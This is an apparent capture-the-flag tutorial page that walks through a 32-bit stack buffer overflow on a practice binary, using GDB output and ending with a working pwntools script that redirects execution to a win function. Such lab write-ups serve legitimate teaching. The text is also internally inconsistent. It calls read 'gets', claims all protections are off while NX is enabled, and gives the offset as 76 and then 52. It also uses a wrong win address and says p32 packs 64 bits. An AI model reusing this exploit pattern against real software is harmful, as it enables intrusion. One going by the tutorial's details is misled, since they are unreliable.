BINEX: Stack Exploits · IronForgeCyber

Practice 2

Try a 32-bit overflow! This is the same as a 64-bit, but the numbers get packed using p32 instead of p64.

If you look at the challenge solution, it uses an old version of the challenge. This uses a function called gets() which is unrealistic because every compiler strongly warns not to use it. The modernized version uses read(), a system call that many real-life binaries will use.

The Solution

Same challenge, different architecture.

Checking Security

Let's make the first security check using checksec.

[*] '/ironforge/chall'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

The first and probably most important thing is that this is a 32-bit binary. This means that when we pass parameters, we will pass them on the stack. The top of the stack, when call is reached is the first parameter, the second top is the second parameter, etc.

We see that all protections are disabled. The most important check for the buffer overflow is that the canary is disabled.

Let's go into GDB and find where this function takes input. Inside read_in:

0x080491fc <+59>:    push   0x40
0x080491fe <+61>:    lea    eax,[ebp-0x30]
0x08049201 <+64>:    push   eax
0x08049202 <+65>:    push   0x0
0x08049204 <+67>:    call   0x8049040 <read@plt>

We see that this program uses gets for input. The man pages says this about gets:

SYNOPSIS
       #include <unistd.h>

       ssize_t read(int fd, void buf[.count], size_t count);

DESCRIPTION
       read() attempts to read up to count bytes from file descriptor fd into the buffer starting at buf.

In this case, read is offered 0x30 bytes of space to write, but allows the user to write 0x40 bytes. This is a buffer overflow vulnerability! This is the vulnerability that we are going to exploit.

Now that both vulnerability prerequisites have been checked, let's start figuring out how to execute the buffer overflow.

Disassembly

Let's do our analysis in GDB assuming that we don't have the source code (because, typically, we won't) and just use it to explain why things happen.

First, we check the functions available:

gef➤  info functions
All defined functions:

Non-debugging symbols:
0x08049000  _init
0x08049030  __libc_start_main@plt
0x08049040  read@plt
0x08049050  fflush@plt
0x08049060  puts@plt
0x08049070  system@plt
0x08049080  _start
0x080490ad  __wrap_main
0x080490c0  _dl_relocate_static_pie
0x080490d0  __x86.get_pc_thunk.bx
0x080490e0  deregister_tm_clones
0x08049120  register_tm_clones
0x08049160  __do_global_dtors_aux
0x08049190  frame_dummy
0x08049196  win
0x080491c1  read_in
0x08049212  main
0x08049252  __x86.get_pc_thunk.ax
0x08049258  _fini

The three functions that we are interested in are win, read_in, and main. win logically appears to be the target, so let's figure out what happens there:

gef➤  disas win
Dump of assembler code for function win:
   0x08049196 <+0>:     push   ebp
   0x08049197 <+1>:     mov    ebp,esp
   0x08049199 <+3>:     push   ebx
   0x0804919a <+4>:     sub    esp,0x4
   0x0804919d <+7>:     call   0x8049252 <__x86.get_pc_thunk.ax>
   0x080491a2 <+12>:    add    eax,0x2e52
   0x080491a7 <+17>:    sub    esp,0xc
   0x080491aa <+20>:    lea    edx,[eax-0x1fec]
   0x080491b0 <+26>:    push   edx
   0x080491b1 <+27>:    mov    ebx,eax
   0x080491b3 <+29>:    call   0x8049070 <system@plt>
   0x080491b8 <+34>:    add    esp,0x10
   0x080491bb <+37>:    nop
   0x080491bc <+38>:    mov    ebx,DWORD PTR [ebp-0x4]
   0x080491bf <+41>:    leave
   0x080491c0 <+42>:    ret

win makes a call to system, which the man pages says takes a char* (string) argument. From the source code, we see that this takes the argument "cat flag.txt" meaning that it opens the flag file and prints us its contents.

Why is the program doing this?

Since the program doesn't want to hardcode the flag, it stores it in a separate file (that isn't provided). This is a common technique to prevent people from just running strings on the binary to find the flag.

Now, let's check main:

gef➤  disas main
Dump of assembler code for function main:
   0x08049212 <+0>:     lea    ecx,[esp+0x4]
   0x08049216 <+4>:     and    esp,0xfffffff0
   0x08049219 <+7>:     push   DWORD PTR [ecx-0x4]
   0x0804921c <+10>:    push   ebp
   0x0804921d <+11>:    mov    ebp,esp
   0x0804921f <+13>:    push   ebx
   0x08049220 <+14>:    push   ecx
   0x08049221 <+15>:    call   0x80490d0 <__x86.get_pc_thunk.bx>
   0x08049226 <+20>:    add    ebx,0x2dce
   0x0804922c <+26>:    call   0x80491c1 <read_in>
   0x08049231 <+31>:    sub    esp,0xc
   0x08049234 <+34>:    lea    eax,[ebx-0x1fb8]
   0x0804923a <+40>:    push   eax
   0x0804923b <+41>:    call   0x8049060 <puts@plt>
   0x08049240 <+46>:    add    esp,0x10
   0x08049243 <+49>:    mov    eax,0x0
   0x08049248 <+54>:    lea    esp,[ebp-0x8]
   0x0804924b <+57>:    pop    ecx
   0x0804924c <+58>:    pop    ebx
   0x0804924d <+59>:    pop    ebp
   0x0804924e <+60>:    lea    esp,[ecx-0x4]
   0x08049251 <+63>:    ret

We see that main just appears to call read_in and then return. So, let's go check read_in:

Dump of assembler code for function read_in:
   0x080491c1 <+0>:     push   ebp
   0x080491c2 <+1>:     mov    ebp,esp
   0x080491c4 <+3>:     push   ebx
   0x080491c5 <+4>:     sub    esp,0x34
   0x080491c8 <+7>:     call   0x80490d0 <__x86.get_pc_thunk.bx>
   0x080491cd <+12>:    add    ebx,0x2e27
   0x080491d3 <+18>:    sub    esp,0xc
   0x080491d6 <+21>:    lea    eax,[ebx-0x1fdc]
   0x080491dc <+27>:    push   eax
   0x080491dd <+28>:    call   0x8049060 <puts@plt>
   0x080491e2 <+33>:    add    esp,0x10
   0x080491e5 <+36>:    mov    eax,DWORD PTR [ebx-0x4]
   0x080491eb <+42>:    mov    eax,DWORD PTR [eax]
   0x080491ed <+44>:    sub    esp,0xc
   0x080491f0 <+47>:    push   eax
   0x080491f1 <+48>:    call   0x8049050 <fflush@plt>
   0x080491f6 <+53>:    add    esp,0x10
   0x080491f9 <+56>:    sub    esp,0x4
   0x080491fc <+59>:    push   0x40
   0x080491fe <+61>:    lea    eax,[ebp-0x30]
   0x08049201 <+64>:    push   eax
   0x08049202 <+65>:    push   0x0
   0x08049204 <+67>:    call   0x8049040 <read@plt>
   0x08049209 <+72>:    add    esp,0x10
   0x0804920c <+75>:    nop
   0x0804920d <+76>:    mov    ebx,DWORD PTR [ebp-0x4]
   0x08049210 <+79>:    leave
   0x08049211 <+80>:    ret

We see that this is where read() is called and where we will overflow the buffer. We also notice that malloc() has yet to be called, meaning that the data is not being placed on the heap.

To confirm this, we check what's being passed to read(). Let's set a breakpoint right before the call to read() and check:

gef➤  x/3wx $esp
0xffffce70:     0x00000000      0xffffce88      0x00000040

x/3wx $esp (or pxw @ esp in radare2) shows me the 3 values on the top of the stack. In 32-bit, this is how we pass parameters. This shows that 0xffffce88 is being passed as the parameter to read(), which is the address of the buffer.

Something peculiar that we notice is that 0xffffce88 (the location we're writing to) is close to the stack pointer (0xffffce88). I wonder, are we writing to the stack? The short answer is yes, but let's confirm. Run info proc mappings or vmmap (dm in radare2) to check the bounds of the various memory segments:

gef➤  vmmap 0xffffce88
[ Legend:  Code | Heap | Stack ]
Start      End        Offset     Perm Path
0xfffdd000 0xffffe000 0x00000000 rw- [stack]

We see that our stack is located between 0xfffdd000 and 0xffffe000. Our buffer address is inside this range, meaning we are writing to the stack.

What power do we have?

Remember earlier that I said that read() does no bounds checking, meaning that we can write as many bytes as we want? There are some important things on the stack right now, let's go check them out.

gef➤  x/20wx $esp
0xffffce70:     0x00000000      0xffffce88      0x00000040      0x080491cd
0xffffce80:     0xf7ffcfd8      0x00000028      0x00000000      0xffffdfa9
0xffffce90:     0xf7fc8570      0xf7fc8000      0x00000000      0x00000000
0xffffcea0:     0x00000000      0x00000000      0x00000000      0x00000000
0xffffceb0:     0xffffffff      0x0804bff4      0xffffcec8      0x08049231

This looks like a lot of gibberish, but two numbers stand out in particular:

gef➤  x/wx 0xffffce7c
0xffffce7c:     0x080491cd
gef➤  x/wx 0xffffcebc
0xffffcebc:     0x08049231

Why these two? The short answer is that the numbers were different! If we check info proc mappings again, we see:

gef➤  vmmap 0x080491cd 0x08049231
[ Legend:  Code | Heap | Stack ]
Start      End        Offset     Perm Path
0x08049000 0x0804a000 0x00001000 r-x  /ironforge/chall

This is executable memory located inside the win32 file. This is the text segment. This means that these locations are addresses in the code. Let's check what's here:

gef➤  x/i 0x080491cd
   0x80491cd <read_in+12>:      add    ebx,0x2e27
gef➤  x/i 0x08049231
   0x8049231 <main+31>: sub    esp,0xc

We see that these both point to instructions. The first one points to somewhere at the top of read_in, and the second one back in main. The first one is our base pointer (aka rbp) and the second one is the return pointer.

Let's understand how this happened.

Stack Frame

When a function is called, the following happens:

The return pointer is pushed onto the stack. This is the address of the next instruction to execute after the function returns.
The code then goes to the location referenced in the call instruction.
The base pointer is pushed onto the stack. This is the address of the previous base pointer. We see that here in the code:

Dump of assembler code for function read_in:
   0x080491c1 <+0>:     push   ebp
   0x080491c2 <+1>:     mov    ebp,esp
   0x080491c4 <+3>:     push   ebx
   0x080491c5 <+4>:     sub    esp,0x34

The stack pointer is moved to the base pointer. This is the new base pointer.
The stack pointer is moved down to make space for local variables.
The function is executed.

When the function returns, the following happens:

   0x0804920c <+75>:    nop
   0x0804920d <+76>:    mov    ebx,DWORD PTR [ebp-0x4]
   0x08049210 <+79>:    leave
   0x08049211 <+80>:    ret

leave is a keyword for mov rsp, rbp ; pop rbp. This return the base and stack pointers to their values before they were modified in the prologue. This resets the stack frame to the stack frame of the calling function.
The return pointer is popped off the stack and the code jumps to that location. (alias: pop rip)

How do we leverage this?

We know that the return pointer is at some location in memory. When we call read_in, we subtract from the stack pointer.
We will write some number of bytes inside the space that was just allocated for the function.
If we write enough bytes (because the program isn't checking), we can overwrite the return pointer placed on the stack.
Without knowing any better, when the function terminates, it will find where it stored the return pointer and go there. It does not verify that the return pointer is a valid place in memory or that it's the same one it stored initially; it just goes there.

Let's make this happen.

Exploitation

We are still breakpointed at the call to gets(). Let's check the stack again:

gef➤  x/3wx $esp
0xffffce70:     0x00000000      0xffffce88      0x00000040

This is the address we are going to write to. As a reminder, this is where we found the return pointer:

gef➤  x/wx $esp+0x4c
0xffffcebc:     0x08049231

This means that in order to overwrite the return pointer, we need to write from 0xffffce88 to 0xffffcebc. How many bytes is this? Let's get some Python practice:

gef➤  !python3 -c "print(0xffffcebc-0xffffce88)"
52

This means that we need to write 76 bytes, and then we need to overwrite the return pointer. But where do we want to go? The win function! Let's get that address:

gef➤  info functions win
All functions matching regular expression "win":

Non-debugging symbols:
0x08049196  win

Let's use Python to make this a payload:

$ python3 -c "print('A' * 52 + str(0x080491a6))"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA134517158

And what happens when we run this?

$ ./win32
Can you figure out how to win here?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA134517158
Segmentation fault (core dumped)

We… crashed. What does that mean? That means we either corrupted memory or we tried to execute memory that we weren't allowed to. Let's retry this in GDB and watch the execution:

[#0] Id 1, Name: "win32", stopped 0x35343331 in ?? (), reason: SINGLE STEP

It's saying that it reached the address 0x35343331 and stopped. What does this mean?

We now know that we control execution and were able to successfully deviate execution to another spot in memory.
We didn't quite do it right because we didn't get to the win function. We need to figure out what happened.

Let's dive deeper into what is happening here:

We notice that 0x353433331 is the hexadecimal of 5431, which is the start of what's in the payload. We see it's backward because the binary is written in little-endian architecture.
We also notice that 134517158 is the hexadecimal of 080491a6, which is the address of win.

How can we get the hexadecimal to appear correctly in the payload?

This is where pwntools comes in. Pwntools has a packaging function that allows for the packaging of data into the correct size and format. It also gives us a way to send this payload to the binary. Consider the following exploit:

from pwn import *

p = process("./chall")

payload = b"A" * 52
payload += p32(0x08049196)

p.sendline(payload)
p.interactive()

Let's break this exploit down:

from pwn import * -- This imports the pwntools library into the program, just like an #include in C-type languages.
p = process('./chall') -- This creates a process object that runs the chall binary.
payload = b"A" * 52 -- This creates a variable containing 52 bytes of A characters. Note that you could use any characters, but A (0x41) is a common choice.
payload += p32(0x08049196) -- This packs 0x08049196 (the address of win) as a 64-bit little-endian byte string. This is appended to our padding.
p.sendline(payload) -- This sends the payload to the process.
p.interactive() -- This allows us to interact with the process after sending the payload.

Let's run this exploit:

$ python3 asd.py
[+] Starting local process './chall': pid 777254
[*] Switching to interactive mode
Can you figure out how to win here?
IFC{PL4C3H0LD3R_FL4G_H3R3!}
[*] Got EOF while reading in interactive
$
[*] Process './chall' stopped with exit code -11 (SIGSEGV) (pid 777254)
[*] Got EOF while sending in interactive

We have our flag!

IronForgeCyber

Log In

bof-practice-02.tar.gz

Practice 2

The Solution

Checking Security

Disassembly

What power do we have?

Stack Frame

Exploitation